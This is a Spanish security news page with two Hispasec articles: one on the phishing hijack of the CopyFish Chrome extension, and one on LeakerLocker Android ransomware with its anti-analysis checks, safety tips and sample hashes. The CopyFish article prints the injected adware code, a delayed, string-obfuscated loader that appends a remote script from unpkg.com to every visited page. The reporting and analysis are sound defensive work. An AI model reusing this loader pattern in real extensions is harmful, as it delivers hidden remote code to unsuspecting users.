You are here

Noticias

CopyFish: Extensión para Google Chrome secuestrada e infectada con adware

Hispasec - Wed, 02/08/2017 - 17:23
CopyFish es un software de OCR para Google Chrome que permite extraer textos de imágenes, PDFs y vídeos. La extensión cuenta a día de hoy con 37.740 usuarios, que recibieron el pasado 29 de julio una nueva actualización que venía con una desagradable sorpresa.

Y es que la extensión había sido secuestrada. Mediante un ataque de phishing dirigido a uno de los desarrolladores, los atacantes lograron acceder a su cuenta de "Google extensions" y robar la aplicación, transfiriéndola a otra cuenta bajo su control.

El phishing mostraba un login falso a Google extensions y estaba alojado en https://chromedev.freshdesk.com

Phishing de Google Extension
Tras modificar la aplicación, publicaron la nueva versión del plugin (V2.8.5) en el repositorio de Google.

Los usuarios empezaron a reportar anuncios y spam en las webs que visitaban, lo que levantó las sospechas de los desarrolladores, que en ese punto ya habían perdido el control sobre su aplicación.

Gracias a un usuario de la comunidad de HackerNews se pudo contactar con uno de los administradores de UNPKG, un CDN para paquetes 'npm' que utilizaba la extensión maliciosa. Gracias a esto se pudo desactivar rápidamente el malware:

El pasado 1 de agosto el soporte técnico de Google devolvió la aplicación a sus legítimos desarrolladores, que actualizaron rápidamente el plugin con una versión limpia:
UPDATE August 1, 2017: This is the new, updated and SAFE version of Copyfish. For more details on what happened please see https://a9t9.com/blog/chrome-extension-adware/Además se desactivó la versión maliciosa para los usuarios que aún la tenían instalada.

Los cambios que introducía el adware cargaban código Javascript alojado en UNPKG y añadían algún código para debuggear la aplicación:

En el archivo manifest.js:

"matches": [ "<all_urls>" ] -> se sustituyó por "matches": [ "\u003Call_urls>" ]

En background.js:

console.log("Start");

chrome.runtime.onInstalled.addListener(function(details) {
    console.log("onInstalled");
    if(details.reason == "install") {
        console.log("This is a first install!");
    } else if(details.reason == "update"){
        var thisVersion = chrome.runtime.getManifest().version;
        console.log("Updated from " + details.previousVersion + " to " + thisVersion);
          chrome.storage.local.set({'installed': Date.now()});
    }
});

En cs.js, donde se carga el código malicioso:

chrome.storage.local.get('installed', function (item) {
    if (item && item.installed) {
      installed = item.installed;
      console.log('Installed:' + installed);

      if (installed) {
        console.log('Installed ms:' + (Date.now() - installed));

        if ((Date.now() - installed) > 10 * 60 * 1000) {
          console.log('Now');

          var date = new Date();
          var hour = date.getUTCHours();

          console.log(hour);

          var thisVersion = chrome.runtime.getManifest().version;

          console.log(thisVersion);
          thisVersion = thisVersion.replace('.', '-');
          thisVersion = thisVersion.replace('.', '-');
          console.log(thisVersion);

          var hash = "copyfish-npm-" + thisVersion;

          console.log(hash);

          var config_fragment = '<sc' + 'ript sr' + 'c="ht'+ 'tps://un' + 'p' + 'kg.com/' + hash + '/' + hour + '.js"></sc ' + 'ript>';

          var range = document.createRange();
          range.setStart(document.body, 0);
          document.body.appendChild(range.createContextualFragment(config_fragment));
        }
      }
    }
  });


A día de hoy la versión infectada ya está desactivada y se han tomado las medidas de seguridad oportunas. Decir que sólo afecta a Google Chrome, la versión para Firefox no ha sido comprometida.

Más información:

Extensión oficial en Googlehttps://chrome.google.com/webstore/detail/copyfish-%F0%9F%90%9F-free-ocr-soft/eenjdnjldapjajjofmldgmkjaienebbj

Comunicación oficial de los desarrolladores
https://a9t9.com/blog/chrome-extension-adware/

Conversación en HackerNews
https://news.ycombinator.com/item?id=14888010


Francisco Salidofsalido@hispasec.com
Categories: Seguridad

LeakerLocker, el malware para Android que amenaza con chivarse a tus contactos

Hispasec - Tue, 01/08/2017 - 11:47
Nacido a principios de 2016 y repuntando en los últimos días, LeakerLocker amenaza con mandar tu información personal (fotos, números, mensajes...) a todos tus contactos si no pagas un rescate. En su última campaña se ha hecho pasar por aplicaciones legítimas en Google Play.

La pantalla del resc
Bajo los nombres Wallpapers Blur HD, Booster & Cleaner Pro, y Calls Recorder, se encontraba en Google Play hasta hace poco este peculiar malware. Entre otros, amenaza con enviar a todos tus contactos tus fotos, números de teléfono, mensajes de Facebook, correos electrónicos... Si no pagas una modesta cantidad. O al menos eso es lo que dice, porque no se ha encontrado esta supuesta funcionalidad en el código de la aplicación. Aunque tampoco se puede descartar, ya que este troyano contempla la ejecución de código arbitrario descargado de los servidores del atacante.

La línea temporal de este malware no es especialmente compleja. Primero, infecta al usuario haciéndose pasar por una aplicación legítima en Google Play. Segundo, recopila la información personal e información sobre el uso del dispositivo. Finalmente, y tras varias comprobaciones que comentamos a continuación, descarga código adicional de servidores del atacante y lo ejecuta. En este código se pueden observar funciones relacionadas con la apertura, gestión e intercepción de datos de WebViews (vistas web genéricas), funcionalidades usadas entre otras cosas para suplantar la identidad de aplicaciones legítimas y capturar sus credenciales. Pero aparte de bloquear el móvil con la imagen que se muestra arriba (y no permitir su uso hasta el pago) no realiza más actividades maliciosas.

Una de las funcionalidades más interesantes de este malware es la lista de comprobaciones que realiza para permitir su propia ejecución. A priori, uno puede pensar que, una vez infectados, lo interesante es que se ejecute siempre. Pero pensándolo bien sería interesante que no se ejecutase en condiciones de laboratorio (cuando se analiza el malware) para evitar su detección intencionada por expertos. Entre otras, realiza las siguientes comprobaciones:

  • Hay más de 10 contactos y más de 10 fotos
  • Constan 3 o más registros de llamadas
  • La aplicación se ha descargado a través de Google Play

Adicionalmente, la parte principal del malware no se ejecuta hasta pasados 15 minutos desde la infección, lo que es una contramedida contra técnicas de análisis automático.
Una de las aplicaciones por las que se hace pasar este malware

Para evitar infectarse con este tipo de malware, ya en Google Play, aquí van unos cuantos consejos aplicables por el usuario de a pie:
  • No instalar aplicaciones que usen la imagen o suplanten la identidad de aplicaciones oficiales (Una aplicación con el icono de WhatsApp)
  • Comprobar que los permisos que pide la aplicación para instalarse tienen sentido (una aplicación de una linterna que pide permiso para usar el micrófono, sospechoso...)
  • Comprobar los comentarios negativos, a veces avisar que es malware o incluso que la aplicación no funciona (hay mucho malware muy mal programado...)
  • No instalar aplicaciones que prometen funcionalidad maligna (hacer trampas en un juego o "hackear" WhatsApp, si es que te mereces la infección...)

Más información sobre este malware y su comportamiento se puede encontrar buscando en Koodous las muestras con los siguientes hashes:
cb0a777e79bcef4990159e1b6577649e1fca632bfca82cb619eea0e4d7257e7b486f80edfb1dea13cde87827b14491e93c189c26830b5350e31b07c787b29387299b3a90f96b3fc1a4e3eb29be44cb325bd6750228a9342773ce973849507d12c9330f3f70e143418dbdf172f6c2473564707c5a34a5693951d2c5fc73838459d82330e1d84c2f866a0ff21093cb9669aaef2b07bf430541ab6182f98f6fdf8248e44bf56ce9c91d38d39978fd05b0cb0d31f4bdfe90376915f2d0ce1de5965814ccc15b40213a0680fc8c3a12fca4830f7930eeda95c40d1ae6098f9ac051464701a359647442d9b2d589cbba9ac7cf56949539410dbb4194d9980ec0d6b5d4


Más información:

LeakerLocker Mobile Ransomware Threatens to Expose User Information
http://blog.trendmicro.com/trendlabs-security-intelligence/leakerlocker-mobile-ransomware-threatens-expose-user-information/

LeakerLocker: Mobile Ransomware Acts Without Encryptionhttps://securingtomorrow.mcafee.com/mcafee-labs/leakerlocker-mobile-ransomware-acts-without-encryption/?awc=7545_1501598599_24d36516f8b0fefc43b9cff1c3a52551

LeakerLocker Ransomware Found in Two Apps on the Google Play Store
https://www.bleepingcomputer.com/news/security/leakerlocker-ransomware-found-in-two-apps-on-the-google-play-store/

Twitter: #leakerlocker
https://twitter.com/hashtag/leakerlocker


Carlos Ledesmacledesma@hispasec.com
Categories: Seguridad

Pages

Subscribe to Bytecoders aggregator